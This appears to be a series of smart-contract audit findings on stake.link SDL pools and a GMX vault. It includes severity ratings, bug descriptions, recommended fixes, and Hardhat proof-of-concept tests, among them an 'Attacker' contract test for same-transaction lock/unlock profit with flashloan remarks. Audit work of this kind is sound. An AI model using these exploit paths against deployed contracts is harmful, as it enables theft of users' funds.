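Note this only blocks approvals made to current operators; clearing token approvals inside `setApprovalForAll` when `_approved` is false would cover approvals granted before the operator role, at the cost of iterating the operator's approved locks.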
Impact: An uncleared approval gives continued, unauthorized access to transfer the lock.
A user can lose funds in `sdlPoolSecondary` if he tries to add more SDL tokens to a lock that has been queued to be completely withdrawn
Severity: medium
On a secondary chain, if a user adds more SDL to a lock that he has queued to withdraw entirely within the same index batch, he will lose the extra amount he deposited.
The process to withdraw all the funds from a lock on the primary chain is simply calling withdraw with the lock's whole base amount. At that point the user immediately gets his funds back and the lock is deleted, hence the owner becomes the zero address.
However, on a secondary chain, a user has to queue a withdrawal of all the funds and wait for the keeper to send the update to the primary chain, execute the updates, and then receive his SDL tokens back. In the window before the keeper sends the update to the primary chain, if a user queues a withdrawal of the lock's whole base amount, he still owns the lock, because the withdrawal has only been queued, not executed. So the user can still make any modification to his lock, for example increase his lock base amount by calling `transferAndCall()` on the `sdlToken`, passing the address of the `sdlPoolSecondary` as argument.
If this happens, when the keeper sends the update to the primary chain and the user executes the updates for his lockId, he will lose the extra amount he deposited, because the updates execute in order: first the withdrawal of all the funds, which deletes the ownership (making the zero address the owner), and then the increase of the base amount of a lock now owned by the zero address.
So the lockId ends up owned by the zero address, with the extra SDL tokens the user sent as its base amount.
Proof of concept (it is written inside `sdl-pool-secondary.test.ts` because it uses its setup):
```
it('PoC user will lose extra deposited tokens', async () => {

  let user = accounts[1]
  let initialUserSDLBalance = await sdlToken.balanceOf(user);

  // User creates a lock depositing some amount
  await sdlToken
    .connect(signers[1])
    .transferAndCall(
      sdlPool.address,
      toEther(100),
      ethers.utils.defaultAbiCoder.encode(['uint256', 'uint64'], [0, 0])
    )

  await sdlPool.handleOutgoingUpdate()
  await sdlPool.handleIncomingUpdate(1)
  await sdlPool.connect(signers[1]).executeQueuedOperations([])

  assert.equal(await sdlPool.ownerOf(1), user)

  // User queues a withdraw of all the amount from the lock
  await sdlPool.connect(signers[1]).withdraw(1, toEther(100))

  // User wants to deposit more tokens to the lock while the withdraw is not yet
  // executed and is still sitting in the queue
  await sdlToken
    .connect(signers[1])
    .transferAndCall(
      sdlPool.address,
      toEther(1000),
      ethers.utils.defaultAbiCoder.encode(['uint256', 'uint64'], [1, 0])
    )

  await sdlPool.handleOutgoingUpdate()
  await sdlPool.handleIncomingUpdate(2)
  // When executing the updates, the zero address will become the owner of his lock
  // and the amount he deposited the last time will be lost
  await sdlPool.connect(signers[1]).executeQueuedOperations([1])

  let finalUserSDLBalance = await sdlToken.balanceOf(user);
  let sdlLost = initialUserSDLBalance.sub(finalUserSDLBalance)

  console.log("The user has lost", sdlLost.toString(), "sdl tokens")

  // This static call should revert because now the lock owner is the zero address
  await expect(sdlPool.ownerOf(1)).to.be.revertedWith('InvalidLockId()')
})
```

Output:
```
  SDLPoolSecondary
The user has lost 1000000000000000000000 sdl tokens
    ✔ PoC user is not able to execute his lock updates (159ms)


  1 passing (3s)
```
Recommendation: When trying to perform any action on a lock in a secondary pool, check that the last queued update does not have 0 as the base amount. If it does, the user has queued a withdrawal of all funds and will lose ownership of the lock at the next keeper update (added line marked with `+`):
```
function _queueLockUpdate(
    address _owner,
    uint256 _lockId,
    uint256 _amount,
    uint64 _lockingDuration
) internal onlyLockOwner(_lockId, _owner) {
    Lock memory lock = _getQueuedLockState(_lockId);
+   if (lock.amount == 0) revert();
    LockUpdate memory lockUpdate = LockUpdate(updateBatchIndex, _updateLock(lock, _amount, _lockingDuration));
    queuedLockUpdates[_lockId].push(lockUpdate);
    queuedRESDLSupplyChange +=
        int256(lockUpdate.lock.amount + lockUpdate.lock.boostAmount) -
        int256(lock.amount + lock.boostAmount);
    if (updateNeeded == 0) updateNeeded = 1;

    emit QueueUpdateLock(_owner, _lockId, lockUpdate.lock.amount, lockUpdate.lock.boostAmount, lockUpdate.lock.duration);
}
```
Impact: High, user will lose funds.
Funds can be locked for 1 second and unlocked in the same transaction to gain profit
Severity: low
A user can lock funds for 1 second and unlock them in the same transaction to gain profit. Even if the per-lock profit is small, there is no flashloan protection, so a malicious user can flashloan a large amount and sandwich the rebasing upkeep to take advantage of the pool (compounded by a division-rounding-to-zero problem) and extract profit from it. In this way the total staked amount can be manipulated: `checkUpkeep` and `performUpkeep` are completely user-accessible, so the total staked amount can be shifted in the malicious user's favor.

Run the PoC with:
```
npx hardhat test --network hardhat --grep 'usage of Attack contract and receiving NFT'
```

```
import { Signer } from 'ethers'
import { assert, expect } from 'chai'
import {
  toEther,
  deploy,
  getAccounts,
  setupToken,
  fromEther,
  deployUpgradeable,
} from '../../utils/helpers'
import {
  ERC677,
  LinearBoostController,
  RewardsPool,
  SDLPoolPrimary,
  StakingAllowance,
  Attacker
} from '../../../typechain-types'
import { ethers } from 'hardhat'
import { time } from '@nomicfoundation/hardhat-network-helpers'
// 1 day in seconds
const DAY = 86400

// parsing Lock struct in contracts
const parseLocks = (locks: any) =>
  locks.map((l: any) => ({
    amount: fromEther(l.amount),
    // show digits after decimal
    boostAmount: Number(fromEther(l.boostAmount).toFixed(10)),
    startTime: l.startTime.toNumber(),
    duration: l.duration.toNumber(),
    expiry: l.expiry.toNumber(),
  }))

const parseData = (data: any) => ({
  operator: data.operator,
  from: data.from,
  tokenId: data.tokenId,
  data: Buffer.from(data.data.slice(2), 'hex').toString('utf8')
})

describe('SDLPoolPrimary', () => {
  let sdlToken: StakingAllowance
  let rewardToken: ERC677
  let rewardsPool: RewardsPool
  let boostController: LinearBoostController
  let sdlPool: SDLPoolPrimary
  let signers: Signer[]
  let accounts: string[]
  let attacker: Attacker
  before(async () => {
    ;({ signers, accounts } = await getAccounts())
  })

  beforeEach(async () => {
    sdlToken = (await deploy('StakingAllowance', ['stake.link', 'SDL'])) as StakingAllowance
    rewardToken = (await deploy('ERC677', ['Chainlink', 'LINK', 1000000000])) as ERC677

    await sdlToken.mint(accounts[0], toEther(1000000))
    await setupToken(sdlToken, accounts)

    boostController = (await deploy('LinearBoostController', [
      4 * 365 * DAY,
      4,
    ])) as LinearBoostController

    sdlPool = (await deployUpgradeable('SDLPoolPrimary', [
      'Reward Escrowed SDL',
      'reSDL',
      sdlToken.address,
      boostController.address,
    ])) as SDLPoolPrimary

    rewardsPool = (await deploy('RewardsPool', [
      sdlPool.address,
      rewardToken.address,
    ])) as RewardsPool

    await sdlPool.addToken(rewardToken.address, rewardsPool.address)
    await sdlPool.setCCIPController(accounts[0])
    // attack contract deployment -- setting bridge contract to same, we won't need ccip here
    attacker = await deploy("Attacker", [sdlPool.address, sdlPool.address, sdlToken.address]) as Attacker
    await sdlToken.transfer(attacker.address, toEther(20000))
    const sender = signers[0] // or choose any unlocked account
    const valueToSend = ethers.utils.parseEther("100") // Amount of Ether to send
    const tx = await sender.sendTransaction({
      to: attacker.address,
      value: valueToSend,
    });

    await tx.wait();
    console.log("Funded contract!");
  })
  it('should be able to lock an existing stake', async () => {
    // with flashloan this may prove fatal
    await sdlToken.transferAndCall(
      sdlPool.address,
      toEther(10000),
      ethers.utils.defaultAbiCoder.encode(['uint256', 'uint64'], [0, 0])
    )
    await sdlPool.extendLockDuration(1, 365 * DAY)
    let ts = (await ethers.provider.getBlock(await ethers.provider.getBlockNumber())).timestamp

    assert.equal(fromEther(await sdlPool.totalEffectiveBalance()), 200)
    assert.equal(fromEther(await sdlPool.totalStaked()), 200)
    assert.equal(fromEther(await sdlPool.effectiveBalanceOf(accounts[0])), 200)
    assert.equal(fromEther(await sdlPool.staked(accounts[0])), 200)
    assert.deepEqual(parseLocks(await sdlPool.getLocks([1])), [
      { amount: 100, boostAmount: 100, startTime: ts, duration: 365 * DAY, expiry: 0 },
    ])

    // Move one block forward
    //await ethers.provider.send('evm_mine', []);
    //console.log("Parsed lock :", parseLocks(await sdlPool.getLocks([1])))
  })
  //@audit NFT onERC721receiver doesnt work it seems..
  it('usage of Attack contract and receiving NFT', async () => {
    console.log("Block-number before tx:", await ethers.provider.getBlockNumber())
    let ts = (await ethers.provider.getBlock(await ethers.provider.getBlockNumber())).timestamp
    // Move one block forward
    await ethers.provider.send('evm_mine', [ts + 1]);
    console.log("SDLToken balance Before:", await sdlToken.balanceOf(attacker.address))
    await attacker.attackTransfernCall()
    console.log("Lock", parseLocks(await sdlPool.getLocks([1])))
    console.log("Block-number after tx:", await ethers.provider.getBlockNumber())
    console.log("Nft received ??:", await attacker.received());
    //boostAmount: 0.0006341958 20_000 -> with flashloan
    //boostAmount: 0.000006342 200
  })
})
```
Recommendation: Set a lower limit on the locking duration to prevent the lock-unlock-withdraw sequence within one transaction. This should also stop the flashloan attacks. A minimum of 1 day is preferable.
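One way to implement that floor, sketched against `LinearBoostController`; the `minLockingDuration` field and the error are hypothetical additions, and where exactly the check is enforced is a design choice:
```
uint64 public minLockingDuration = 1 days; // hypothetical new field

error LockingDurationTooShort();

// Called wherever a lock is created or extended. Duration 0 (no lock) can
// remain allowed; anything between 1 second and the floor is rejected,
// which blocks same-transaction lock/unlock round trips.
function _checkLockingDuration(uint64 _lockingDuration) internal view {
    if (_lockingDuration != 0 && _lockingDuration < minLockingDuration) {
        revert LockingDurationTooShort();
    }
}
```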
Impact: Loss of pool rewards gained by rebasing.
Attacker can exploit lock update logic on secondary chains to increase the amount of rewards sent to a specific secondary chain
Severity: medium
Users with existing reSDL NFTs on secondary chains (prior to a decrease in `maxBoost`) are able to increase `queuedRESDLSupplyChange` by a greater amount than should be possible given the current `maxBoost` value, which then allows them to funnel more rewards to their secondary chain (as `queuedRESDLSupplyChange` maps to `reSDLSupplyByChain[...]`, which is used to calculate the rewards distributed to each secondary chain).
Consider the scenario in which the stake.link team decreases the `maxBoost` value of the `LinearBoostController` so that newer depositors get less rewards than OG depositors. This allows an attacker on a secondary chain to perform the following attack to fraudulently increase the amount of rewards sent to their chain:
Assume for simplicity that the starting values of the `LinearBoostController` contract are maxBoost = 10 and `maxLockingDuration` = 10_000 seconds. The attacker starts with a single (for simplicity) reSDL NFT on a secondary chain with amount = 100_000 and lockingDuration = 5_000 seconds, meaning their boost is calculated to be: 100_000 * 10 * 5_000/10_000 = 500_000.
Then the stake.link team decreases `maxBoost` to 5. Following this, the attacker first calls `SDLPoolSecondary:extendLockDuration` with a `_lockingDuration` of 9_999, which then calls the internal `_queueLockUpdate`, defined as follows:
```
function _queueLockUpdate(
    address _owner,
    uint256 _lockId,
    uint256 _amount,
    uint64 _lockingDuration
) internal onlyLockOwner(_lockId, _owner) {
    Lock memory lock = _getQueuedLockState(_lockId);
    LockUpdate memory lockUpdate = LockUpdate(updateBatchIndex, _updateLock(lock, _amount, _lockingDuration));
    queuedLockUpdates[_lockId].push(lockUpdate);
    queuedRESDLSupplyChange +=
        int256(lockUpdate.lock.amount + lockUpdate.lock.boostAmount) -
        int256(lock.amount + lock.boostAmount);
    // rest of code
}
```

As part of this function call, `_updateLock` is triggered to perform the update, defined as follows:
```
function _updateLock(
    Lock memory _lock,
    uint256 _amount,
    uint64 _lockingDuration
) internal view returns (Lock memory) {
    if ((_lock.expiry == 0 || _lock.expiry > block.timestamp) && _lockingDuration < _lock.duration) {
        revert InvalidLockingDuration();
    }

    Lock memory lock = Lock(_lock.amount, _lock.boostAmount, _lock.startTime, _lock.duration, _lock.expiry);

    uint256 baseAmount = _lock.amount + _amount;
    uint256 boostAmount = boostController.getBoostAmount(baseAmount, _lockingDuration);

    // rest of code
    lock.boostAmount = boostAmount;
    // rest of code
}
```

Most important to note here: (1) since the `_lockingDuration` of 9_999 is greater than the existing duration of 5_000, this call succeeds, and (2) the `boostAmount` is recalculated using the new `maxBoost` value of 5. The attacker's new `boostAmount` is: 100_000 * 5 * 9_999/10_000 = 499_950. Since this value is less than the previous 500_000, `queuedRESDLSupplyChange` in the `_queueLockUpdate` call is decremented by 50.
After the `SDLPoolSecondary:extendLockDuration` call is complete, this update is queued. At some point an update to this secondary SDL pool will be triggered, and once that's complete, the attacker will be able to execute the update. To do so, the attacker calls `executeQueuedOperations`, specifying their reSDL NFT, which triggers `_executeQueuedLockUpdates`, which has the following logic:
```
// rest of code
uint256 numUpdates = queuedLockUpdates[lockId].length;

Lock memory curLockState = locks[lockId];
uint256 j = 0;
while (j < numUpdates) {
    if (queuedLockUpdates[lockId][j].updateBatchIndex > finalizedBatchIndex) break;

    Lock memory updateLockState = queuedLockUpdates[lockId][j].lock;
    int256 baseAmountDiff = int256(updateLockState.amount) - int256(curLockState.amount);
    int256 boostAmountDiff = int256(updateLockState.boostAmount) - int256(curLockState.boostAmount);

    if (baseAmountDiff < 0) {
        // rest of code
    } else if (boostAmountDiff < 0) {
        locks[lockId].expiry = updateLockState.expiry;
        locks[lockId].boostAmount = 0;
        emit InitiateUnlock(_owner, lockId, updateLockState.expiry);
    } else {
        // rest of code
    }
    // rest of code
}
// rest of code
```

Recall that the attacker has only a single queued update, whose only difference is the decrease of 50 in `boostAmount`. This triggers the `boostAmountDiff < 0` branch, which sets `locks[lockId].boostAmount = 0`. This is clearly incorrect logic and allows the attacker to fraudulently increase `queuedRESDLSupplyChange`, ultimately directing more rewards to this secondary chain.
Continuing the attack, the attacker again calls `SDLPoolSecondary:extendLockDuration`, this time with a `_lockingDuration` of 10_000. Referencing the same snippet as earlier, in `_updateLock` the `boostAmount` is now calculated as: 100_000 * 5 * 10_000/10_000 = 500_000. In `_queueLockUpdate`, `queuedRESDLSupplyChange` is calculated as (100_000 + 500_000) - (100_000 + 0) = 500_000, based on this equation:
```
queuedRESDLSupplyChange +=
    int256(lockUpdate.lock.amount + lockUpdate.lock.boostAmount) -
    int256(lock.amount + lock.boostAmount);
```

Recall that the value of 0 comes from the improper logic in the `_executeQueuedLockUpdates` call. In aggregate, `queuedRESDLSupplyChange` has been increased by 500_000 - 50 = 499_950. Had the attacker simply increased their locking duration to the max value of 10_000 after the `maxBoost` update, there would have been 0 change in `queuedRESDLSupplyChange`.
The fundamental bug here is that after a decrease in `maxBoost`, the update logic allows all existing reSDL NFTs to increase `queuedRESDLSupplyChange` more than should be possible, and `queuedRESDLSupplyChange` is a major factor in the percentage of rewards going to a given secondary chain.
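For reference, the arithmetic in the walkthrough above assumes the linear boost formula below; this is a sketch reconstructed from those numbers, not a quote of `LinearBoostController`'s actual implementation, and the types are illustrative:
```
// boost = amount * maxBoost * lockingDuration / maxLockingDuration
function getBoostAmount(uint256 _amount, uint64 _lockingDuration) public view returns (uint256) {
    // 100_000 * 10 * 5_000 / 10_000 = 500_000   (before the maxBoost decrease)
    // 100_000 * 5  * 9_999 / 10_000 = 499_950   (after maxBoost drops to 5)
    return (_amount * uint256(maxBoost) * uint256(_lockingDuration)) / uint256(maxLockingDuration);
}
```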
Recommendation: The `_executeQueuedLockUpdates` function implicitly assumes that a decrease in `boostAmountDiff` can only come from calling `initiateUnlock`. An additional case is needed to handle a boost decrease caused by a reduction of `maxBoost`.
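A minimal sketch of that extra case, written as a replacement for the `boostAmountDiff < 0` branch shown above. It distinguishes a genuine `initiateUnlock` (which sets a nonzero `expiry` and zeroes the boost) from a parameter-driven boost decrease; this is hypothetical, untested logic, and the right discriminator depends on how the update structs are populated:
```
if (baseAmountDiff < 0) {
    // withdrawal case (unchanged)
} else if (boostAmountDiff < 0) {
    if (updateLockState.expiry != 0 && updateLockState.boostAmount == 0) {
        // Genuine initiateUnlock: expiry was set and the boost fully removed.
        locks[lockId].expiry = updateLockState.expiry;
        locks[lockId].boostAmount = 0;
        emit InitiateUnlock(_owner, lockId, updateLockState.expiry);
    } else {
        // Boost shrank because maxBoost was lowered: keep the lock active and
        // record the recalculated (nonzero) boost instead of zeroing it.
        locks[lockId].boostAmount = updateLockState.boostAmount;
        locks[lockId].duration = updateLockState.duration;
    }
} else {
    // increase case (unchanged)
}
```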
Impact: Users with existing reSDL NFTs on secondary chains (prior to a decrease in `maxBoost`) are able to increase `queuedRESDLSupplyChange` by a greater amount than should be possible given the current `maxBoost` value, which then allows them to funnel more rewards to their secondary chain.
Updates from the `secondary pool` to the `primary pool` may not be sent because there are `no rewards` for the secondary pool
Severity: low
The SDLPoolCCIPControllerSecondary::performUpkeep() function is only available when there is a `message of rewards` from the `SDLPoolCCIPControllerPrimary`. That could be a problem if there are not rewards to distribute in a specific `secondary chain` causing that queue updates from the `secondarly chain` will not be informed to the `SDLPoolPrimary`.\\nThe `secondary chain` informs to the `primary chain` the new `numNewRESDLTokens` and `totalRESDLSupplyChange` using the SDLPoolCCIPControllerSecondary::performUpkeep function, then the `primary chain` receives the information and it calculates the new mintStartIndex. Note that the `primary chain` increments the `reSDLSupplyByChain` in the `code line 300`, this so that the `primary chain` has the information on how much supply of reSDL tokens there is in the secondary chain:\\n```\\nFile: SDLPoolCCIPControllerPrimary.sol\\n function _ccipReceive(Client.Any2EVMMessage memory _message) internal override {\\n uint64 sourceChainSelector = _message.sourceChainSelector;\\n\\n (uint256 numNewRESDLTokens, int256 totalRESDLSupplyChange) = abi.decode(_message.data, (uint256, int256));\\n\\n if (totalRESDLSupplyChange > 0) {\\n reSDLSupplyByChain[sourceChainSelector] += uint256(totalRESDLSupplyChange);\\n } else if (totalRESDLSupplyChange < 0) {\\n reSDLSupplyByChain[sourceChainSelector] -= uint256(-1 * totalRESDLSupplyChange);\\n }\\n\\n uint256 mintStartIndex = ISDLPoolPrimary(sdlPool).handleIncomingUpdate(numNewRESDLTokens, totalRESDLSupplyChange);\\n\\n _ccipSendUpdate(sourceChainSelector, mintStartIndex);\\n\\n emit MessageReceived(_message.messageId, sourceChainSelector);\\n }\\n```\\n\\nNow the mintStartIndex is send to the secondary chain code line 307 and the secondary chain receives the new mintStartIndex. 
This entire process helps to keep the information updated between the primary chain and the secondary chain.\\nOn the other hand, when a secondary chain receives rewards, the secondary chain can call the function SDLPoolCCIPControllerSecondary::performUpkeep since `shouldUpdate` is `true` at code line 157:\\n```\\nFile: SDLPoolCCIPControllerSecondary.sol\\n function _ccipReceive(Client.Any2EVMMessage memory _message) internal override {\\n if (_message.data.length == 0) {\\n uint256 numRewardTokens = _message.destTokenAmounts.length;\\n address[] memory rewardTokens = new address[](numRewardTokens);\\n if (numRewardTokens != 0) {\\n for (uint256 i = 0; i < numRewardTokens; ++i) {\\n rewardTokens[i] = _message.destTokenAmounts[i].token;\\n IERC20(rewardTokens[i]).safeTransfer(sdlPool, _message.destTokenAmounts[i].amount);\\n }\\n ISDLPoolSecondary(sdlPool).distributeTokens(rewardTokens);\\n if (ISDLPoolSecondary(sdlPool).shouldUpdate()) shouldUpdate = true;\\n }\\n } else {\\n uint256 mintStartIndex = abi.decode(_message.data, (uint256));\\n ISDLPoolSecondary(sdlPool).handleIncomingUpdate(mintStartIndex);\\n }\\n\\n emit MessageReceived(_message.messageId, _message.sourceChainSelector);\\n }\\n```\\n\\nOnce `shouldUpdate` is `true`, the function SDLPoolCCIPControllerSecondary::performUpkeep can be called in order to send the new information (numNewRESDLTokens and totalRESDLSupplyChange) to the primary chain:\\n```\\n function performUpkeep(bytes calldata) external {\\n if (!shouldUpdate) revert UpdateConditionsNotMet();\\n\\n shouldUpdate = false;\\n _initiateUpdate(primaryChainSelector, primaryChainDestination, extraArgs);\\n }\\n```\\n\\nThe problem is that the `primary chain` needs to send rewards to the `secondary chain` for `shouldUpdate` to become true so that the function SDLPoolCCIPControllerSecondary::performUpkeep can be called. However, in certain circumstances the `secondary chain` may never be able to send information to the `primary chain`, since there may not be any rewards for the `secondary chain`. 
Consider the following scenario:\\n`UserA` stakes directly in the `secondary chain` and `queuedRESDLSupplyChange` increases.\\nThe increase in supply CANNOT be reported to the `primary chain`, since `shouldUpdate = false` and the SDLPoolCCIPControllerSecondary::performUpkeep function reverts.\\nRewards are calculated on the `primary chain`; however, because the `secondary chain` has not been able to send the new supply information, zero rewards will be calculated for the `secondary chain`, since `reSDLSupplyByChain[chainSelector]` has not been increased with the new information from `step 1`.\\nSince there are NO rewards assigned for the `secondary chain`, it is not possible to set `shouldUpdate = true`; therefore the SDLPoolCCIPControllerSecondary::performUpkeep function reverts.\\nThe following test shows that a user can send `sdl` tokens to the `secondary pool`; however, SDLPoolCCIPControllerSecondary::performUpkeep cannot be called since there are no rewards assigned to the secondary pool:\\n```\\n// File: test/core/ccip/sdl-pool-ccip-controller-secondary.test.ts\\n// $ yarn test --grep "codehawks performUpkeep reverts"\\n// \\n it('codehawks performUpkeep reverts', async () => {\\n await token1.transfer(tokenPool.address, toEther(1000))\\n let rewardsPool1 = await deploy('RewardsPool', [sdlPool.address, token1.address])\\n await sdlPool.addToken(token1.address, rewardsPool1.address)\\n assert.equal(fromEther(await sdlPool.totalEffectiveBalance()), 400)\\n assert.equal((await controller.checkUpkeep('0x'))[0], false)\\n assert.equal(await controller.shouldUpdate(), false)\\n //\\n // 1. Mint in the secondary pool\\n await sdlToken.transferAndCall(\\n sdlPool.address,\\n toEther(100),\\n ethers.utils.defaultAbiCoder.encode(['uint256', 'uint64'], [0, 0])\\n )\\n //\\n // 2. The secondary pool needs to update data to the primary chain but the `controller.shouldUpdate` is false so `performUpkeep` reverts the transaction\\n assert.equal(await sdlPool.shouldUpdate(), true)\\n assert.equal((await controller.checkUpkeep('0x'))[0], false)\\n assert.equal(await controller.shouldUpdate(), false)\\n await expect(controller.performUpkeep('0x')).to.be.revertedWith('UpdateConditionsNotMet()')\\n })\\n```\\n
Updates from the `secondary pool` to the `primary pool` may not be sent because there are `no rewards` for the `secondary pool`\\nThe SDLPoolCCIPControllerSecondary::performUpkeep function should check whether the `secondary pool` has new information, rather than waiting for rewards to become available for the secondary pool:\\n```\\n function performUpkeep(bytes calldata) external {\\n// Remove the line below\\n// Remove the line below\\n if (!shouldUpdate) revert UpdateConditionsNotMet();\\n// Add the line below\\n// Add the line below\\n if (!shouldUpdate && !ISDLPoolSecondary(sdlPool).shouldUpdate()) revert UpdateConditionsNotMet();\\n\\n shouldUpdate = false;\\n _initiateUpdate(primaryChainSelector, primaryChainDestination, extraArgs);\\n }\\n```\\n
`numNewRESDLTokens` and `totalRESDLSupplyChange` updates from the `secondary pool` to the `primary pool` may not be executed, causing the rewards calculation to be incorrect for each chain.
```\\nFile: SDLPoolCCIPControllerPrimary.sol\\n function _ccipReceive(Client.Any2EVMMessage memory _message) internal override {\\n uint64 sourceChainSelector = _message.sourceChainSelector;\\n\\n (uint256 numNewRESDLTokens, int256 totalRESDLSupplyChange) = abi.decode(_message.data, (uint256, int256));\\n\\n if (totalRESDLSupplyChange > 0) {\\n reSDLSupplyByChain[sourceChainSelector] += uint256(totalRESDLSupplyChange);\\n } else if (totalRESDLSupplyChange < 0) {\\n reSDLSupplyByChain[sourceChainSelector] -= uint256(-1 * totalRESDLSupplyChange);\\n }\\n\\n uint256 mintStartIndex = ISDLPoolPrimary(sdlPool).handleIncomingUpdate(numNewRESDLTokens, totalRESDLSupplyChange);\\n\\n _ccipSendUpdate(sourceChainSelector, mintStartIndex);\\n\\n emit MessageReceived(_message.messageId, sourceChainSelector);\\n }\\n```\\n
depositors face immediate loss in case `equity = 0`
medium
The vulnerability in the `valueToShares` function exposes users to significant losses in case the equity `(currentAllAssetValue - debtBorrowed)` becomes zero due to strategy losses: users receive disproportionately low shares and take a loss immediately.\\nWhen a user deposits to the contract, the calculation of the shares to be minted depends on the `value` of `equity` added to the contract after a successful deposit. In other words:\\n`value` = `equityAfter` - `equityBefore`, while:\\n`equity` = `totalAssetValue` - `totalDebtValue`, as we can see here:\\n```\\n function processDeposit(GMXTypes.Store storage self) external {\\n self.depositCache.healthParams.equityAfter = GMXReader.equityValue(self);\\n self.depositCache.sharesToUser = GMXReader.valueToShares(\\n self,\\n self.depositCache.healthParams.equityAfter - self.depositCache.healthParams.equityBefore,\\n self.depositCache.healthParams.equityBefore\\n );\\n\\n GMXChecks.afterDepositChecks(self);\\n }\\n // value to shares function :\\n\\n function valueToShares(GMXTypes.Store storage self, uint256 value, uint256 currentEquity)\\n public\\n view\\n returns (uint256)\\n {\\n\\n uint256 _sharesSupply = IERC20(address(self.vault)).totalSupply() + pendingFee(self); // shares is added\\n if (_sharesSupply == 0 || currentEquity == 0) return value;\\n return value * _sharesSupply / currentEquity;\\n }\\n```\\n\\nNOTICE: When the equity value is `0`, the shares minted to the user equal the deposited value itself. The equity value can become zero due to various factors such as strategy losses or accumulated lending interest, etc.\\nIn this scenario, the user immediately incurs a loss, depending on the total supply of `svToken` (shares).\\nConsider the following simplified example:\\nThe total supply of `svToken` is (1,000,000 * 1e18) (indicating users holding these shares).\\nThe equity value drops to zero due to strategy losses and a user deposits 100 USD worth of value.\\nDue to the zero equity value, the user is minted 100 shares (100 * 1e18).\\nConsequently, the value the user owns with these shares immediately reduces to about 0.01 USD: `(100 * 1e18) * 100 / (1,000,000 * 1e18) ≈ 0.01 USD` (shares * equity / totalSupply).\\nIn this case, the user immediately shares their entire deposited value with the previously minted shares and loses almost their entire deposit, whereas those old shares should be liquidated somehow.\\nNotice: If the total supply is higher, the user loses more value, and vice versa.
use a liquidation mechanism that burns the shares of all users when equity drops to zero.
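A minimal sketch of one way to wire this in, assuming the check runs in `processDeposit` before shares are priced (the error name is hypothetical):\\n```\\nfunction processDeposit(GMXTypes.Store storage self) external {\\n uint256 _supply = IERC20(address(self.vault)).totalSupply();\\n // stale shares with zero backing: halt instead of minting value 1:1\\n if (self.depositCache.healthParams.equityBefore == 0 && _supply > 0) {\\n self.status = GMXTypes.Status.Paused; // governance burns the old shares before reopening\\n revert Errors.ZeroEquityWithOutstandingShares(); // hypothetical error\\n }\\n // rest of code (existing mint logic)\\n}\\n```\\n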
users face immediate loss of funds in case equity drops to zero
```\\n function processDeposit(GMXTypes.Store storage self) external {\\n self.depositCache.healthParams.equityAfter = GMXReader.equityValue(self);\\n self.depositCache.sharesToUser = GMXReader.valueToShares(\\n self,\\n self.depositCache.healthParams.equityAfter - self.depositCache.healthParams.equityBefore,\\n self.depositCache.healthParams.equityBefore\\n );\\n\\n GMXChecks.afterDepositChecks(self);\\n }\\n // value to shares function :\\n\\n function valueToShares(GMXTypes.Store storage self, uint256 value, uint256 currentEquity)\\n public\\n view\\n returns (uint256)\\n {\\n\\n uint256 _sharesSupply = IERC20(address(self.vault)).totalSupply() + pendingFee(self); // shares is added\\n if (_sharesSupply == 0 || currentEquity == 0) return value;\\n return value * _sharesSupply / currentEquity;\\n }\\n```\\n
incorrect handling of compound cancellation leaves the vault stuck at `compound_failed` status
medium
The compound function allows the keeper to swap a token for TokenA or TokenB and add it as liquidity to `GMX`. However, if the deposit gets cancelled, the contract enters the `compound_failed` status, leading to a deadlock and preventing further protocol interactions.\\nThe `compound` function is invoked by the keeper to swap a token held by the contract (e.g., from an airdrop, as the sponsor said) for TokenA or TokenB. It first exchanges this token for either tokenA or tokenB and sets the status to `compound`, then adds the swapped token as liquidity to `GMX` by creating a deposit:\\n```\\n function compound(GMXTypes.Store storage self, GMXTypes.CompoundParams memory cp) external {\\n if (self.tokenA.balanceOf(address(self.trove)) > 0) {\\n self.tokenA.safeTransferFrom(address(self.trove), address(this), self.tokenA.balanceOf(address(self.trove)));\\n }\\n if (self.tokenB.balanceOf(address(self.trove)) > 0) {\\n self.tokenB.safeTransferFrom(address(self.trove), address(this), self.tokenB.balanceOf(address(self.trove)));\\n }\\n\\n uint256 _tokenInAmt = IERC20(cp.tokenIn).balanceOf(address(this));\\n\\n // Only compound if tokenIn amount is more than 0\\n if (_tokenInAmt > 0) {\\n self.refundee = payable(msg.sender); // the msg.sender is the keeper.\\n\\n self.compoundCache.compoundParams = cp; // storage update.\\n\\n ISwap.SwapParams memory _sp;\\n\\n _sp.tokenIn = cp.tokenIn;\\n _sp.tokenOut = cp.tokenOut;\\n _sp.amountIn = _tokenInAmt;\\n _sp.amountOut = 0; // amount out minimum calculated in Swap\\n _sp.slippage = self.minSlippage; // minSlippage may cause a revert, leaving the tokens in this contract.\\n _sp.deadline = cp.deadline;\\n\\n GMXManager.swapExactTokensForTokens(self, _sp); // return value not checked.\\n\\n GMXTypes.AddLiquidityParams memory _alp;\\n\\n _alp.tokenAAmt = self.tokenA.balanceOf(address(this));\\n _alp.tokenBAmt = self.tokenB.balanceOf(address(this));\\n // returns zero when both balances are zero\\n self.compoundCache.depositValue = GMXReader.convertToUsdValue(\\n self, address(self.tokenA), self.tokenA.balanceOf(address(this))\\n ) + GMXReader.convertToUsdValue(self, address(self.tokenB), self.tokenB.balanceOf(address(this)));\\n // reverts if value is zero, status is not Open or Compound_Failed, or executionFee < minExecutionFee.\\n GMXChecks.beforeCompoundChecks(self);\\n\\n self.status = GMXTypes.Status.Compound;\\n\\n _alp.minMarketTokenAmt =\\n GMXManager.calcMinMarketSlippageAmt(self, self.compoundCache.depositValue, cp.slippage);\\n\\n _alp.executionFee = cp.executionFee;\\n self.compoundCache.depositKey = GMXManager.addLiquidity(self, _alp);\\n }\\n```\\n\\nIn the event of a successful deposit, the contract sets the status to `open` again. However, if the deposit is cancelled, the callback calls the `processCompoundCancellation()` function and the status is set to `compound_failed`, as shown in the following code:\\n```\\n function processCompoundCancellation(GMXTypes.Store storage self) external {\\n GMXChecks.beforeProcessCompoundCancellationChecks(self);\\n self.status = GMXTypes.Status.Compound_Failed;\\n\\n emit CompoundCancelled();\\n }\\n```\\n\\nThe issue arises when the deposit is cancelled and the status becomes `compound_failed`. In this scenario, only the compound function can be called again, and only by the keeper, but the tokens have already been swapped for TokenA or TokenB (because a deposit was successfully created in `GMX`, the swap must have succeeded). 
